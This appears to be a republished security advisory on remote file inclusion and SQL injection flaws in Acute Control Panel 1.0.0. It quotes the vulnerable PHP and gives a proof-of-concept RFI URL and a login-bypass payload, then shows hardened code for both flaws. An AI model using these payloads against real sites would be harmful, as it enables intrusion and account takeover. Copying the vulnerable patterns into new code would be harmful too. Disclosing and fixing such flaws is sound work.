Acute Control Panel 1.0.0 (SQL/RFI) Multiple Remote Vulnerabilities

2009.04.08
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

Vulnerable code in container.php
-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

PoC :

http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerable code in header.php
--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

PoC :

http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

Vulnerable code in login.php
--------------------------------------------
$query = mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());
--------------------------------------------

PoC :

Username : admin ' or ' 1=1
Password : anything or nothing

################################################################
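Hardened counterparts to the two patterns quoted above, added here as an example and not code from Acute Control Panel: the theme include is resolved against a fixed root plus an allowlist instead of a request-controlled string, and the login query is parameterised with the password checked against a stored hash. The names THEME_ROOT, $pdo (a PDO connection) and $configuredTheme are assumptions of this example.

```php
<?php
// Example hardening for the advisory's two findings (not the project's own code).
// Assumes: a PDO connection $pdo, and themes living under THEME_ROOT.
declare(strict_types=1);

const THEME_ROOT = __DIR__ . '/themes';

// 1. Theme include: never hand request-controlled strings to include_once.
//    Accept only a plain theme name and one of a fixed set of files, then
//    confirm the resolved path still sits under THEME_ROOT.
function resolveThemeFile(string $theme, string $file): string
{
    // Plain directory names only: no slashes, dots, scheme prefixes or NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $theme)) {
        throw new InvalidArgumentException('invalid theme name');
    }
    $allowedFiles = ['sidebar.php', 'navigation.php'];
    if (!in_array($file, $allowedFiles, true)) {
        throw new InvalidArgumentException('invalid theme file');
    }
    $root = realpath(THEME_ROOT);
    $path = realpath(THEME_ROOT . '/' . $theme . '/' . $file);
    // realpath() returns false for missing files and collapses "..";
    // the prefix check rejects anything that escaped the themes root.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('theme file not found');
    }
    return $path;
}

// In container.php / header.php, with the theme name taken from configuration
// rather than from the request:
//   include_once resolveThemeFile($configuredTheme, 'sidebar.php');

// 2. Login: bound parameter instead of string interpolation, and the password
//    is verified in PHP against a password_hash() value, not compared in SQL.
function authenticate(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password, email, fullname, permissions'
        . ' FROM `users` WHERE username = :u'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null; // unknown user or wrong password; no SQL logic to subvert
    }
    unset($row['password']);
    return $row;
}
```

The include-side fix only matters because $theme_directory can be populated from the request (register_globals or equivalent); disabling allow_url_include and register_globals in php.ini closes the remote-include path independently of the code change.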

References:

http://xforce.iss.net/xforce/xfdb/49444
http://www.securityfocus.com/bid/34265
http://www.milw0rm.com/exploits/8291
http://secunia.com/advisories/34485


Copyright 2021, cxsecurity.com